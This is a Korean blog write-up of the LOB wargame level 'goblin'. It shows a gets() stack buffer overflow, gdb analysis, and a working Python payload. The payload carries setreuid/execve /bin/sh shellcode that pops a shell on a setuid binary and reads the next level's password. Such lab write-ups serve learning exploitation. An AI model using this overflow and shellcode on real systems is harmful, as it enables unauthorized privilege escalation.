시작
3번째 몬스터인 cobolt 입니다!!
포너블 한 달이면 기본적인건 뭐.. ㅎㅎ
빠르게 잡아주도록 하겠습니다 !
Write UP
[cobolt@localhost cobolt]$ ll
total 16
-rwsr-sr-x 1 goblin goblin 11824 Feb 26 2010 goblin
-rw-r--r-- 1 root root 193 Mar 29 2010 goblin.c
[cobolt@localhost cobolt]$ cat goblin.c
/*
The Lord of the BOF : The Fellowship of the BOF
- goblin
- small buffer + stdin
*/
int main()
{
char buffer[16];
gets(buffer);
printf("%s\n", buffer);
}
앞서 나왔던 두 개의 문제와는 달리 gets()를 이용해서 입력을 받네요.
인자로 받냐 stdin으로 받냐 차이인 것이 전부입니다.
gdb로 메모리를 슬쩍 볼까요? tmp 폴더에 복사 후 뜯어봅시다.
[cobolt@localhost cobolt]$ gdb -q /tmp/goblin
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x80483f8 : push %ebp
0x80483f9 <main+1>: mov %ebp,%esp
0x80483fb <main+3>: sub %esp,16
0x80483fe <main+6>: lea %eax,[%ebp-16]
0x8048401 <main+9>: push %eax
0x8048402 <main+10>: call 0x804830c
0x8048407 <main+15>: add %esp,4
0x804840a <main+18>: lea %eax,[%ebp-16]
0x804840d <main+21>: push %eax
0x804840e <main+22>: push 0x8048470
0x8048413 <main+27>: call 0x804833c
0x8048418 <main+32>: add %esp,8
0x804841b <main+35>: leave
0x804841c <main+36>: ret
0x804841d <main+37>: nop
0x804841e <main+38>: nop
0x804841f <main+39>: nop
딱 버퍼 사이즈만큼만 할당해주네요!
이번에도 nop 썰매를 타고 내려가야겠죠? RET까지 덮은 후 아무 값이나 넣어서 주소를 봐줍시다.
[cobolt@localhost cobolt]$ gdb -q /tmp/goblin
(gdb) b *main+15
Breakpoint 1 at 0x8048407
(gdb) r
Starting program: /tmp/goblin
AAAAAAAAAAAAAAAAAAAABBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
Breakpoint 1, 0x8048407 in main ()
(gdb) x/100wx $ebp-16
0xbffffb38: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffb48: 0x41414141 0x42424242 0x43434343 0x43434343
0xbffffb58: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffffb68: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffffb78: 0x43434343 0x00434343 0x0804844c 0x4000ae60
0xbffffb88: 0xbffffb8c 0x40013e90 0x00000001 0xbffffc7f
0xbffffb98: 0x00000000 0xbffffc8b 0xbffffc9c 0xbffffcbb
0xbffffba8: 0xbffffcdd 0xbffffce9 0xbffffeac 0xbffffecb
0xbffffbb8: 0xbffffee7 0xbffffefc 0xbfffff1a 0xbfffff25
0xbffffbc8: 0xbfffff34 0xbfffff3c 0xbfffff4d 0xbfffff57
0xbffffbd8: 0xbfffff65 0xbfffff76 0xbfffff84 0xbfffff8f
0xbffffbe8: 0xbfffffa1 0x00000000 0x00000003 0x08048034
0xbffffbf8: 0x00000004 0x00000020 0x00000005 0x00000006
0xbffffc08: 0x00000006 0x00001000 0x00000007 0x40000000
0xbffffc18: 0x00000008 0x00000000 0x00000009 0x08048350
0xbffffc28: 0x0000000b 0x000001f6 0x0000000c 0x000001f6
0xbffffc38: 0x0000000d 0x000001f6 0x0000000e 0x000001f6
0xbffffc48: 0x00000010 0x0f8bfbff 0x0000000f 0xbffffc7a
0xbffffc58: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc68: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc78: 0x36690000 0x2f003638 0x2f706d74 0x6c626f67
0xbffffc88: 0x50006e69 0x2f3d4457 0x656d6f68 0x626f632f
0xbffffc98: 0x00746c6f 0x54534f48 0x454d414e 0x636f6c3d
0xbffffca8: 0x6f686c61 0x6c2e7473 0x6c61636f 0x616d6f64
0xbffffcb8: 0x4c006e69 0x4f535345 0x3d4e4550 0x73752f7c
저는 0xbffffb68로 정했습니다!
페이로드를 작성하러 가요!!
stdin을 통해 입력을 받기 때문에 | 로 값을 넘겨주고 cat을 이용해 쉘을 딴 후 입력을 받을 수 있도록 했습니다.
[cobolt@localhost cobolt]$ (python -c 'print "A" * 20 + "\x68\xfb\xff\xbf" + "\x90" * 100 + "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"'; cat) | ./goblin
AAAAAAAAAAAAAAAAAAAAh▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒1̀▒É▒1▒F̀1▒Ph//shh/bin▒▒PS▒▒°
̀1▒̀
id
uid=503(goblin) gid=502(cobolt) egid=503(goblin) groups=502(cobolt)
/bin/my-pass
euid = 503
hackers proof
Exploit!!
마무리
가뿐하네요! 한 달전 pwnable.kr 에서 bof 문제 풀 떄가 생각납니다 ㅠㅠ
빠르게 다음 문제로 넘어가겠습니다!! 감사합니다 :D
'CTF_Write_UP > LOB' 카테고리의 다른 글
| [LOB] wolfman (0) | 2019.05.09 |
|---|---|
| [LOB] orc (0) | 2019.05.09 |
| [LOB] goblin (0) | 2019.05.08 |
| [LOB] gremlin (0) | 2019.05.04 |
| [LOB] gate (0) | 2019.05.04 |